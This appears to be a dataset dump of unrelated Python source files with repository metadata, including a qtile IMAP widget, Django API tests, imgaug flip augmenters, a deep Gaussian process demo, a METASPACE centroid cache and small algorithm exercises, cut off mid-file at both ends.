if line.move_line_id.move_id.id == move_line.move_id.id:
voucher_line_dict = line_dict
if voucher_line_dict:
voucher_line_dict.update({'voucher_id': voucher_id})
voucher_line_obj.create(cr, uid, voucher_line_dict, context=context)
st_line_id = statement_line_obj.create(cr, uid, {
'name': line.order_id.reference or '?',
'amount': - amount,
'partner_id': line.partner_id.id,
'statement_id': statement.id,
'ref': line.communication,
}, context=context)
line_obj.write(cr, uid, [line.id], {'bank_statement_line_id': st_line_id})
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 48.891667 | 250 | 0.592466 | 4,746 | 0.808931 | 0 | 0 | 0 | 0 | 0 | 0 | 1,994 | 0.339867 |
6a04d1fd425aed6effcc3e48e1eb103f0872ab5a | 3,621 | py | Python | libqtile/widget/imapwidget.py | akloster/qtile | bd21d0744e177b8ca01ac129081472577d53ed66 | ["MIT"] | 1 | 2021-04-05T07:15:37.000Z | 2021-04-05T07:15:37.000Z | libqtile/widget/imapwidget.py | akloster/qtile | bd21d0744e177b8ca01ac129081472577d53ed66 | ["MIT"] | 1 | 2022-02-27T12:17:27.000Z | 2022-02-27T12:17:27.000Z | libqtile/widget/imapwidget.py | akloster/qtile | bd21d0744e177b8ca01ac129081472577d53ed66 | ["MIT"] | null | null | null
# -*- coding: utf-8 -*-
# Copyright (c) 2015 David R. Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import imaplib
import re
import keyring
from libqtile.log_utils import logger
from libqtile.widget import base
class ImapWidget(base.ThreadPoolText):
"""Email IMAP widget
This widget will scan one of your imap email boxes and report the number of
unseen messages present. I've configured it to only work with imap with
ssl. Your password is obtained from the Gnome Keyring.
Writing your password to the keyring initially is as simple as (changing
out <userid> and <password> for your userid and password):
1) create the file ~/.local/share/python_keyring/keyringrc.cfg with the
following contents::
[backend]
default-keyring=keyring.backends.Gnome.Keyring
keyring-path=/home/<userid>/.local/share/keyring/
2) Execute the following python shell script once::
#!/usr/bin/env python3
import keyring
user = <userid>
password = <password>
keyring.set_password('imapwidget', user, password)
mbox names must include the path to the mbox (except for the default
INBOX). So, for example if your mailroot is ``~/Maildir``, and you want to
look at the mailbox at HomeMail/fred, the mbox setting would be:
``mbox="~/Maildir/HomeMail/fred"``. Note the nested sets of quotes! Labels
can be whatever you choose, of course.
Widget requirements: keyring_.
.. _keyring: https://pypi.org/project/keyring/
"""
defaults = [
('mbox', '"INBOX"', 'mailbox to fetch'),
('label', 'INBOX', 'label for display'),
('user', None, 'email username'),
('server', None, 'email server name'),
]
def __init__(self, **config):
base.ThreadPoolText.__init__(self, "", **config)
self.add_defaults(ImapWidget.defaults)
password = keyring.get_password('imapwidget', self.user)
if password is not None:
self.password = password
        else:
            # Keep poll()'s sentinel check working when the keyring lookup fails.
            self.password = 'Gnome Keyring Error'
            logger.critical('Gnome Keyring Error')
def poll(self):
im = imaplib.IMAP4_SSL(self.server, 993)
if self.password == 'Gnome Keyring Error':
self.text = 'Gnome Keyring Error'
else:
im.login(self.user, self.password)
status, response = im.status(self.mbox, '(UNSEEN)')
self.text = response[0].decode()
self.text = self.label + ': ' + re.sub(r'\).*$', '', re.sub(r'^.*N\s', '', self.text))
im.logout()
return self.text
| 38.521277 | 98 | 0.67219 | 2,384 | 0.658382 | 0 | 0 | 0 | 0 | 0 | 0 | 2,634 | 0.727423 |
6a04e4f203740a253735948c968506f6632354e6 | 2,486 | py | Python | game/views/tests/game_definition_view_test.py | dimadk24/english-fight-api | 506a3eb2cb4cb91203b1e023b5248c27975df075 | ["MIT"] | null | null | null | game/views/tests/game_definition_view_test.py | dimadk24/english-fight-api | 506a3eb2cb4cb91203b1e023b5248c27975df075 | ["MIT"] | null | null | null | game/views/tests/game_definition_view_test.py | dimadk24/english-fight-api | 506a3eb2cb4cb91203b1e023b5248c27975df075 | ["MIT"] | null | null | null
from rest_framework.response import Response
from rest_framework.test import APIClient
from game.models import GameDefinition, AppUser
def create_game_definition(api_client: APIClient) -> Response:
return api_client.post("/api/game_definition")
def get_game_definition(api_client: APIClient, game_def_id: str) -> Response:
return api_client.get(f"/api/game_definition/{game_def_id}")
def test_returns_game_def_to_the_current_user_by_hash_id(api_client):
post_game_def_response = create_game_definition(api_client)
assert post_game_def_response.status_code == 201
game_def_id = post_game_def_response.data["id"]
assert isinstance(game_def_id, str)
get_game_def_response = get_game_definition(api_client, game_def_id)
assert get_game_def_response.status_code == 200
assert get_game_def_response.data == post_game_def_response.data
def test_returns_game_def_to_another_user_by_hash_id(api_client):
post_game_def_response = create_game_definition(api_client)
assert post_game_def_response.status_code == 201
game_def_id = post_game_def_response.data["id"]
assert isinstance(game_def_id, str)
user2 = AppUser.objects.create(vk_id=2, username=2)
api_client.force_authenticate(user2)
get_game_def_response = get_game_definition(api_client, game_def_id)
assert get_game_def_response.status_code == 200
assert get_game_def_response.data == post_game_def_response.data
def test_game_def_not_found_by_int_id(api_client):
post_game_def_response = create_game_definition(api_client)
assert post_game_def_response.status_code == 201
game_def_id = post_game_def_response.data["id"]
int_game_def_id = GameDefinition.objects.get(pk=game_def_id).id.id
assert isinstance(int_game_def_id, int)
get_game_def_response = get_game_definition(
api_client, str(int_game_def_id)
)
assert get_game_def_response.status_code == 404
assert get_game_def_response.data == {"detail": "Страница не найдена."}
def test_game_def_permission_denied_if_started(api_client):
post_game_def_response = create_game_definition(api_client)
game_def_id = post_game_def_response.data["id"]
GameDefinition.objects.filter(id=game_def_id).update(started=True)
get_game_def_response = get_game_definition(api_client, game_def_id)
assert get_game_def_response.status_code == 403
assert get_game_def_response.data == {
'detail': 'К игре уже нельзя подключиться'
}
| 35.514286 | 77 | 0.79284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 188 | 0.074338 |
6a051324d6c23235da009880d6bcb0d30ed4d8dc | 315 | py | Python | 2-Python-Fundamentals (Jan 2021)/Course-Exercises-and-Exams/08-Text-Processing/01_Lab/02-Repeat-Strings.py | karolinanikolova/SoftUni-Software-Engineering | 7891924956598b11a1e30e2c220457c85c40f064 | ["MIT"] | null | null | null | 2-Python-Fundamentals (Jan 2021)/Course-Exercises-and-Exams/08-Text-Processing/01_Lab/02-Repeat-Strings.py | karolinanikolova/SoftUni-Software-Engineering | 7891924956598b11a1e30e2c220457c85c40f064 | ["MIT"] | null | null | null | 2-Python-Fundamentals (Jan 2021)/Course-Exercises-and-Exams/08-Text-Processing/01_Lab/02-Repeat-Strings.py | karolinanikolova/SoftUni-Software-Engineering | 7891924956598b11a1e30e2c220457c85c40f064 | ["MIT"] | null | null | null
# 2. Repeat Strings
# Write a Program That Reads a list of strings. Each string is repeated N times, where N is the length of the string. Print the concatenated string.
strings = input().split()
output_string = ""
for string in strings:
N = len(string)
output_string += string * N
print(output_string)
| 22.5 | 148 | 0.71746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 169 | 0.536508 |
6a05188139a9d21e9e36ba6e3d3eb0801c8187c7 | 416 | py | Python | cloudkeeperV1/plugins/cleanup_aws_loadbalancers/test/test_args.py | mesosphere/cloudkeeper | 11be262df5874c1033cfec9964bba1596cab6a36 | ["Apache-2.0"] | 99 | 2020-04-15T22:56:34.000Z | 2021-06-13T15:04:55.000Z | cloudkeeperV1/plugins/cleanup_aws_loadbalancers/test/test_args.py | mesosphere/cloudkeeper | 11be262df5874c1033cfec9964bba1596cab6a36 | ["Apache-2.0"] | null | null | null | cloudkeeperV1/plugins/cleanup_aws_loadbalancers/test/test_args.py | mesosphere/cloudkeeper | 11be262df5874c1033cfec9964bba1596cab6a36 | ["Apache-2.0"] | 14 | 2020-04-14T22:13:59.000Z | 2021-04-05T16:42:31.000Z
from cklib.args import get_arg_parser, ArgumentParser
from cloudkeeper_plugin_cleanup_aws_loadbalancers import CleanupAWSLoadbalancersPlugin
def test_args():
arg_parser = get_arg_parser()
CleanupAWSLoadbalancersPlugin.add_args(arg_parser)
arg_parser.parse_args()
assert ArgumentParser.args.cleanup_aws_loadbalancers is False
assert ArgumentParser.args.cleanup_aws_loadbalancers_age == "7 days"
| 37.818182 | 86 | 0.834135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0.019231 |
6a0593a2d9f168fbcc460c2d82964c99ec312e4a | 911 | py | Python | mayan/apps/metadata/migrations/0011_auto_20180917_0645.py | prezi/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | ["Apache-2.0"] | 4 | 2019-02-17T08:35:42.000Z | 2019-03-28T06:02:11.000Z | mayan/apps/metadata/migrations/0011_auto_20180917_0645.py | zhoubear/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | ["Apache-2.0"] | 1 | 2018-10-11T13:01:34.000Z | 2018-10-11T13:01:34.000Z | mayan/apps/metadata/migrations/0011_auto_20180917_0645.py | prezi/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | ["Apache-2.0"] | 3 | 2019-01-29T13:21:57.000Z | 2019-10-27T03:20:15.000Z
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-09-17 06:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('metadata', '0010_auto_20180823_2353'),
]
operations = [
migrations.AlterField(
model_name='documentmetadata',
name='value',
field=models.CharField(blank=True, db_index=True, help_text='The actual value stored in the metadata type field for the document.', max_length=255, null=True, verbose_name='Value'),
),
migrations.AlterField(
model_name='metadatatype',
name='name',
field=models.CharField(help_text='Name used by other apps to reference this metadata type. Do not use python reserved words, or spaces.', max_length=48, unique=True, verbose_name='Name'),
),
]
| 35.038462 | 199 | 0.657519 | 752 | 0.825467 | 0 | 0 | 0 | 0 | 0 | 0 | 338 | 0.371021 |
6a0724ca0ed93e378a29473e0b6b5911cc4be4e6 | 944 | py | Python | algorithm/dfs/boj_1260.py | ruslanlvivsky/python-algorithm | 2b49bed33cd0e95b8a1e758008191f4392b3f667 | [
"MIT"
] | 3 | 2021-07-18T14:40:24.000Z | 2021-08-14T18:08:13.000Z | algorithm/dfs/boj_1260.py | jinsuSang/python-algorithm | 524849a0a7e71034d329fef63c4f384930334177 | [
"MIT"
] | null | null | null | algorithm/dfs/boj_1260.py | jinsuSang/python-algorithm | 524849a0a7e71034d329fef63c4f384930334177 | [
"MIT"
] | null | null | null | def dfs(V):
print(V, end=' ')
visited[V] = True
for n in graph[V]:
if not visited[n]:
dfs(n)
# Iterative DFS with an explicit stack (defined as an alternative; not called below)
def dfs_s(V):
stack = [V]
visited[V] = True
while stack:
now = stack.pop()
print(now, end=' ')
for n in graph[now]:
if not visited[n]:
stack.append(n)
visited[n] = True
# Breadth-first search using a FIFO queue
def bfs(V):
visited[V] = True
queue = [V]
while queue:
now = queue.pop(0)
print(now, end=' ')
for n in graph[now]:
if not visited[n]:
queue.append(n)
visited[n] = True
# N: number of vertices, M: number of edges, V: starting vertex
N, M, V = map(int, input().strip().split())
visited = [False] * (N + 1)
graph = [[] for _ in range(N + 1)]
for i in range(M):
a, b = map(int, input().strip().split())
graph[a].append(b)
graph[b].append(a)
for i in range(1, N + 1):
graph[i].sort()
dfs(V)
visited = [False] * (N + 1)
print()
bfs(V)
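# Illustrative run (assumed sample input):
#   4 5 1
#   1 2
#   1 3
#   1 4
#   2 4
#   3 4
# With the sorted adjacency lists above, dfs(V) prints "1 2 4 3" and bfs(V) prints "1 2 3 4".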
| 19.265306 | 44 | 0.470339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 | 0.009534 |
6a07aa532405a92d53e9ed5f46dcbcbd7a845cfa | 634 | py | Python | redirector.py | UKPLab/DiGAT | b044648a6c79428872a778908d3a8a689f0ac3e6 | [
"Apache-2.0"
] | 8 | 2016-06-22T17:02:45.000Z | 2020-11-16T23:46:13.000Z | redirector.py | UKPLab/DiGAT | b044648a6c79428872a778908d3a8a689f0ac3e6 | [
"Apache-2.0"
] | null | null | null | redirector.py | UKPLab/DiGAT | b044648a6c79428872a778908d3a8a689f0ac3e6 | [
"Apache-2.0"
] | 1 | 2019-02-25T04:40:04.000Z | 2019-02-25T04:40:04.000Z | from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
__author__ = "Artem Vovk, Roland Kluge, and Christian Kirschner"
__copyright__ = "Copyright 2013-2015 UKP TU Darmstadt"
__credits__ = ["Artem Vovk", "Roland Kluge", "Christian Kirschner"]
__license__ = "ASL"
class Redirector(webapp.RequestHandler):
def get(self):
self.redirect("/argunit/home")
def post(self):
self.redirect("/argunit/home")
application = webapp.WSGIApplication(
[('/.*', Redirector)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
| 22.642857 | 67 | 0.705047 | 158 | 0.249211 | 0 | 0 | 0 | 0 | 0 | 0 | 186 | 0.293375 |
6a07ddc6734dd5ce8f0853fa4326c144429dfb84 | 5,214 | py | Python | imgaug/augmenters/flip.py | pAoenix/image-Augmented | 4acaa7dc48c6167c1716e39e9e78b1cea2067b4a | [
"MIT"
] | 1 | 2020-12-30T02:48:40.000Z | 2020-12-30T02:48:40.000Z | imgaug/augmenters/flip.py | pAoenix/image-Augmented | 4acaa7dc48c6167c1716e39e9e78b1cea2067b4a | [
"MIT"
] | null | null | null | imgaug/augmenters/flip.py | pAoenix/image-Augmented | 4acaa7dc48c6167c1716e39e9e78b1cea2067b4a | [
"MIT"
] | 2 | 2020-01-14T14:29:49.000Z | 2021-02-20T07:47:02.000Z | """
Augmenters that apply mirroring/flipping operations to images.
Do not import directly from this file, as the categorization is not final.
Use instead ::
from imgaug import augmenters as iaa
and then e.g. ::
seq = iaa.Sequential([
iaa.Fliplr((0.0, 1.0)),
iaa.Flipud((0.0, 1.0))
])
List of augmenters:
* Fliplr
* Flipud
"""
from __future__ import print_function, division, absolute_import
from .. import parameters as iap
import numpy as np
import six.moves as sm
from .meta import Augmenter
class Fliplr(Augmenter): # pylint: disable=locally-disabled, unused-variable, line-too-long
"""
Flip/mirror input images horizontally.
Parameters
----------
p : number or StochasticParameter, optional(default=0)
Probability of each image to get flipped.
name : string, optional(default=None)
See `Augmenter.__init__()`
deterministic : bool, optional(default=False)
See `Augmenter.__init__()`
random_state : int or np.random.RandomState or None, optional(default=None)
See `Augmenter.__init__()`
Examples
--------
>>> aug = iaa.Fliplr(0.5)
would horizontally flip/mirror 50 percent of all input images.
>>> aug = iaa.Fliplr(1.0)
would horizontally flip/mirror all input images.
"""
def __init__(self, p=0, name=None, deterministic=False, random_state=None):
super(Fliplr, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
self.p = iap.handle_probability_param(p, "p")
def _augment_images(self, images, random_state, parents, hooks):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
if samples[i] == 1:
images[i] = np.fliplr(images[i])
return images
def _augment_heatmaps(self, heatmaps, random_state, parents, hooks):
arrs_flipped = self._augment_images(
[heatmaps_i.arr_0to1 for heatmaps_i in heatmaps],
random_state=random_state,
parents=parents,
hooks=hooks
)
for heatmaps_i, arr_flipped in zip(heatmaps, arrs_flipped):
heatmaps_i.arr_0to1 = arr_flipped
return heatmaps
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
if samples[i] == 1:
width = keypoints_on_image.shape[1]
for keypoint in keypoints_on_image.keypoints:
keypoint.x = (width - 1) - keypoint.x
return keypoints_on_images
def get_parameters(self):
return [self.p]
class Flipud(Augmenter): # pylint: disable=locally-disabled, unused-variable, line-too-long
"""
Flip/mirror input images vertically.
Parameters
----------
p : number or StochasticParameter, optional(default=0)
Probability of each image to get flipped.
name : string, optional(default=None)
See `Augmenter.__init__()`
deterministic : bool, optional(default=False)
See `Augmenter.__init__()`
random_state : int or np.random.RandomState or None, optional(default=None)
See `Augmenter.__init__()`
Examples
--------
>>> aug = iaa.Flipud(0.5)
would vertically flip/mirror 50 percent of all input images.
>>> aug = iaa.Flipud(1.0)
would vertically flip/mirror all input images.
"""
def __init__(self, p=0, name=None, deterministic=False, random_state=None):
super(Flipud, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
self.p = iap.handle_probability_param(p, "p")
def _augment_images(self, images, random_state, parents, hooks):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
if samples[i] == 1:
images[i] = np.flipud(images[i])
return images
def _augment_heatmaps(self, heatmaps, random_state, parents, hooks):
arrs_flipped = self._augment_images(
[heatmaps_i.arr_0to1 for heatmaps_i in heatmaps],
random_state=random_state,
parents=parents,
hooks=hooks
)
for heatmaps_i, arr_flipped in zip(heatmaps, arrs_flipped):
heatmaps_i.arr_0to1 = arr_flipped
return heatmaps
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
if samples[i] == 1:
height = keypoints_on_image.shape[0]
for keypoint in keypoints_on_image.keypoints:
keypoint.y = (height - 1) - keypoint.y
return keypoints_on_images
def get_parameters(self):
return [self.p]
| 32.185185 | 103 | 0.652091 | 4,671 | 0.895857 | 0 | 0 | 0 | 0 | 0 | 0 | 1,871 | 0.358842 |
6a0b84b7b59fd4b039d379ec665100c80b070e0d | 1,347 | py | Python | 2. Add Two Numbers DC(12-1-21).py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | 4 | 2020-11-17T05:24:24.000Z | 2021-06-14T21:01:45.000Z | 2. Add Two Numbers DC(12-1-21).py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | null | null | null | 2. Add Two Numbers DC(12-1-21).py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | null | null | null | # Time Complexity - O(n) ; Space Complexity - O(n)
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
        carry = 0
        # Dummy head node; `out.next` will be the head of the result list
        out = temp = ListNode()
        # Add corresponding digits while both lists still have nodes
        while l1 is not None and l2 is not None:
tempsum = l1.val + l2.val
tempsum += carry
if tempsum > 9:
carry = tempsum//10
tempsum %= 10
else:
carry = 0
temp.next = ListNode(tempsum)
temp = temp.next
l1 = l1.next
l2 = l2.next
        # One input list may be longer; keep adding its remaining digits plus the carry
        if l1:
            while l1:
tempsum = l1.val + carry
if tempsum > 9:
carry = tempsum//10
tempsum %= 10
else:
carry = 0
temp.next = ListNode(tempsum)
temp = temp.next
l1 = l1.next
elif l2:
while l2:
tempsum = l2.val + carry
if tempsum > 9:
carry = tempsum//10
tempsum %= 10
else:
carry = 0
temp.next = ListNode(tempsum)
temp = temp.next
l2 = l2.next
        # A leftover carry becomes one final digit
        if carry:
            temp.next = ListNode(carry)
return out.next | 31.325581 | 76 | 0.400148 | 1,295 | 0.961396 | 0 | 0 | 0 | 0 | 0 | 0 | 50 | 0.03712 |
6a0b98cc37e3d3bfecf8eba880eba829290a251c | 1,862 | py | Python | deepgp_dsvi/demos/step_function.py | dks28/Deep-Gaussian-Process | a7aace43e78aae81468849aee7d172742e6ecf86 | [
"MIT"
] | 21 | 2020-03-07T15:40:13.000Z | 2021-11-05T07:49:24.000Z | deepgp_dsvi/demos/step_function.py | dks28/Deep-Gaussian-Process | a7aace43e78aae81468849aee7d172742e6ecf86 | [
"MIT"
] | 3 | 2021-02-03T13:32:45.000Z | 2021-07-17T16:07:06.000Z | src/demos/step_function.py | FelixOpolka/Deep-Gaussian-Process | 40181f210d7b09863c321d1a90335be77233df80 | [
"MIT"
] | 2 | 2020-08-10T14:02:28.000Z | 2020-12-28T16:03:09.000Z | import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from gpflow.kernels import White, RBF
from gpflow.likelihoods import Gaussian
from deep_gp import DeepGP
np.random.seed(0)
tf.random.set_seed(0)
def get_data():
Ns = 300
Xs = np.linspace(-0.5, 1.5, Ns)[:, None]
N, M = 50, 25
X = np.random.uniform(0, 1, N)[:, None]
Z = np.random.uniform(0, 1, M)[:, None]
f_step = lambda x: 0. if x < 0.5 else 1.
Y = np.reshape([f_step(x) for x in X], X.shape) + np.random.randn(
*X.shape) * 1e-2
return Xs, X, Y, Z
def make_deep_GP(num_layers, X, Y, Z):
kernels = []
layer_sizes = []
for l in range(num_layers):
kernel = RBF(lengthscales=0.2, variance=1.0) + White(variance=1e-5)
kernels.append(kernel)
layer_sizes.append(1)
dgp = DeepGP(X, Y, Z, kernels, layer_sizes, Gaussian(), num_samples=100)
# init hidden layers to be near deterministic
for layer in dgp.layers[:-1]:
layer.q_sqrt.assign(layer.q_sqrt * 1e-5)
return dgp
if __name__ == '__main__':
Xs, X_train, Y_train, Z = get_data()
dgp = make_deep_GP(3, X_train, Y_train, Z)
optimizer = tf.optimizers.Adam(learning_rate=0.01, epsilon=1e-08)
for _ in range(1500):
with tf.GradientTape(watch_accessed_variables=False) as tape:
tape.watch(dgp.trainable_variables)
objective = -dgp.elbo((X_train, Y_train))
gradients = tape.gradient(objective, dgp.trainable_variables)
optimizer.apply_gradients(zip(gradients, dgp.trainable_variables))
print(f"ELBO: {-objective.numpy()}")
samples, _, _ = dgp.predict_all_layers(Xs, num_samples=50, full_cov=True)
plt.plot(Xs, samples[-1].numpy()[:, :, 0].T, color='r', alpha=0.3)
plt.title('Deep Gaussian Process')
plt.scatter(X_train, Y_train)
plt.show() | 31.033333 | 77 | 0.645005 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.059076 |
6a0bd26d528523a33d941c1d0799a814a2b95dcf | 5,343 | py | Python | metaspace/engine/sm/engine/annotation_lithops/moldb_pipeline.py | METASPACE2020/METASPACE | e1acd9a409f84a78eed7ca9713258c09b0e137ca | [
"Apache-2.0"
] | 32 | 2018-08-13T15:49:42.000Z | 2022-01-17T18:32:19.000Z | metaspace/engine/sm/engine/annotation_lithops/moldb_pipeline.py | METASPACE2020/METASPACE | e1acd9a409f84a78eed7ca9713258c09b0e137ca | [
"Apache-2.0"
] | 624 | 2018-07-02T15:18:22.000Z | 2022-03-30T08:10:35.000Z | metaspace/engine/sm/engine/annotation_lithops/moldb_pipeline.py | METASPACE2020/METASPACE | e1acd9a409f84a78eed7ca9713258c09b0e137ca | [
"Apache-2.0"
] | 6 | 2021-01-10T22:24:30.000Z | 2022-03-16T19:14:37.000Z | from __future__ import annotations
import json
import logging
from contextlib import contextmanager, ExitStack
from typing import List, Dict
import pandas as pd
from lithops.storage import Storage
from lithops.storage.utils import CloudObject, StorageNoSuchKeyError
from sm.engine.annotation_lithops.build_moldb import (
build_moldb,
InputMolDb,
DbFDRData,
)
from sm.engine.annotation_lithops.calculate_centroids import (
calculate_centroids,
validate_centroids,
)
from sm.engine.annotation_lithops.executor import Executor
from sm.engine.annotation_lithops.io import (
CObj,
save_cobj,
iter_cobjects_with_prefetch,
deserialize,
)
from sm.engine.annotation_lithops.utils import jsonhash
from sm.engine.utils.db_mutex import DBMutex
from sm.engine.ds_config import DSConfig
from sm.engine.annotation.isocalc_wrapper import IsocalcWrapper
logger = logging.getLogger('annotation-pipeline')
class CentroidsCacheEntry:
def __init__(
self, executor: Executor, sm_storage: Dict, ds_config: DSConfig, moldbs: List[InputMolDb]
):
ds_hash_params = ds_config.copy()
self.ds_config = {
**ds_hash_params, # type: ignore # https://github.com/python/mypy/issues/4122
# Include the `targeted` value of databases so that a new cache entry is made if
# someone manually changes that field
'databases': [(moldb['id'], moldb['targeted']) for moldb in moldbs],
}
# Remove database_ids as it may be in a different order to moldbs
del self.ds_config['database_ids']
self.ds_hash = jsonhash(self.ds_config)
self.executor = executor
self.storage = executor.storage
self.bucket, raw_prefix = sm_storage['centroids']
self.prefix = f"{raw_prefix}/{self.ds_hash}"
self.config_key = f'{self.prefix}/ds_config.json'
self.meta_key = f'{self.prefix}/meta'
@contextmanager
def lock(self):
with DBMutex().lock(self.ds_hash, timeout=3600):
yield
def load(self):
try:
db_data_cobjs, peaks_cobjs = deserialize(
self.storage.get_object(self.bucket, self.meta_key)
)
return db_data_cobjs, peaks_cobjs
except StorageNoSuchKeyError:
return None
def save(self, db_data_cobjs: List[CObj[DbFDRData]], peaks_cobjs: List[CObj[pd.DataFrame]]):
def batch_copy(src_cobjs: List[CloudObject], dest_prefix: str, *, storage: Storage):
# If Lithops' storage supported Copy Object operations, this could be easily optimized.
# Not sure if it's worth the effort yet
result_cobjs = []
for i, data in enumerate(iter_cobjects_with_prefetch(storage, src_cobjs)):
dest_key = f'{dest_prefix}/{i:06}'
result_cobjs.append(storage.put_cloudobject(data, dest_bucket, dest_key))
return result_cobjs
dest_bucket = self.bucket
# Copy cobjs to the cache dir
new_db_data_cobjs, new_peaks_cobjs = self.executor.map(
batch_copy,
[(db_data_cobjs, f'{self.prefix}/db_data'), (peaks_cobjs, f'{self.prefix}/peaks')],
runtime_memory=1024,
)
# Save config in case it's needed for debugging
self.storage.put_cloudobject(
json.dumps(self.ds_config, indent=4), self.bucket, self.config_key
)
# Save list of cobjects. This list would be easy to reconstruct by listing keys, but
# saving a separate object as the last step of the process is helpful to confirm that
# the cache item is complete, and didn't partially fail to copy.
save_cobj(self.storage, (new_db_data_cobjs, new_peaks_cobjs), self.bucket, self.meta_key)
return new_db_data_cobjs, new_peaks_cobjs
def clear(self):
keys = self.storage.list_keys(self.bucket, self.prefix)
if keys:
logger.info(f'Clearing centroids cache {self.prefix}')
self.storage.delete_objects(self.bucket, keys)
def get_moldb_centroids(
executor: Executor,
sm_storage: Dict,
ds_config: DSConfig,
moldbs: List[InputMolDb],
debug_validate=False,
use_cache=True,
use_db_mutex=True,
):
moldb_cache = CentroidsCacheEntry(executor, sm_storage, ds_config, moldbs)
with ExitStack() as stack:
if use_db_mutex:
stack.enter_context(moldb_cache.lock())
if use_cache:
cached_val = moldb_cache.load()
else:
cached_val = None
moldb_cache.clear()
if cached_val:
db_data_cobjs, peaks_cobjs = cached_val
logger.info(
f'Loaded {len(db_data_cobjs)} DBs, {len(peaks_cobjs)} peak segms from cache'
)
else:
formula_cobjs, db_data_cobjs = build_moldb(executor, ds_config, moldbs)
isocalc_wrapper = IsocalcWrapper(ds_config)
peaks_cobjs = calculate_centroids(executor, formula_cobjs, isocalc_wrapper)
if debug_validate:
validate_centroids(executor, peaks_cobjs)
moldb_cache.save(db_data_cobjs, peaks_cobjs)
logger.info(f'Saved {len(db_data_cobjs)} DBs, {len(peaks_cobjs)} peak segms to cache')
return db_data_cobjs, peaks_cobjs
| 36.59589 | 99 | 0.668351 | 3,147 | 0.588995 | 90 | 0.016844 | 110 | 0.020588 | 0 | 0 | 1,088 | 0.203631 |
6a0dc9555ac01260e856ab868bd3c294497c065f | 2,830 | py | Python | gui/main_window/node_editor/items/connector_top_item.py | anglebinbin/Barista-tool | 2d51507fb3566881923f0b273127f59d23ed317f | [
"MIT"
] | 1 | 2020-02-11T19:05:17.000Z | 2020-02-11T19:05:17.000Z | gui/main_window/node_editor/items/connector_top_item.py | anglebinbin/Barista-tool | 2d51507fb3566881923f0b273127f59d23ed317f | [
"MIT"
] | null | null | null | gui/main_window/node_editor/items/connector_top_item.py | anglebinbin/Barista-tool | 2d51507fb3566881923f0b273127f59d23ed317f | [
"MIT"
] | null | null | null | from PyQt5.QtWidgets import QMenu
from gui.main_window.node_editor.items.connector_item import ConnectorItem
class ConnectorTopItem(ConnectorItem):
""" Class to provide top connector functionality """
def __init__(self, index, nodeItem, nodeEditor, parent=None):
super(ConnectorTopItem, self).__init__(index, nodeItem, nodeEditor, parent)
def isTopConnector(self):
""" Returns whether the connector is a top connector (implementation for parent class) """
return True
def isInPlace(self):
""" Returns whether the connector is connected to a in-place working layer
A top connector is in place if any connected bottom connector is in place.
(implementation for parent class) """
for connection in self._connections:
if connection.getIsInPlace():
return True
return False
def getConnectedNodes(self):
""" Returns a list of node items, connected to this connector (implementation for parent class) """
nodes = list()
# for each connection get the node connected to the bottom of the connection
for connection in self._connections:
connectionsBottomConnector = connection.getBottomConnector()
if connectionsBottomConnector is not None:
nodes.append(connectionsBottomConnector.getNodeItem())
return nodes
def addConnection(self, connection):
""" Adds a connection to the connector and sets the start of the connection to this connectors position
(implementation for parent class) """
self._connections.append(connection)
connection.setStart(self.scenePos())
def updateConnectionPositions(self):
""" Updates the connected connections, sets the start of all connected connections to this connectors position
(implementation for parent class) """
for connection in self._connections:
connection.setStart(self.scenePos())
def contextMenuEvent(self, event):
""" Context menu for the top connector """
contextMenu = QMenu()
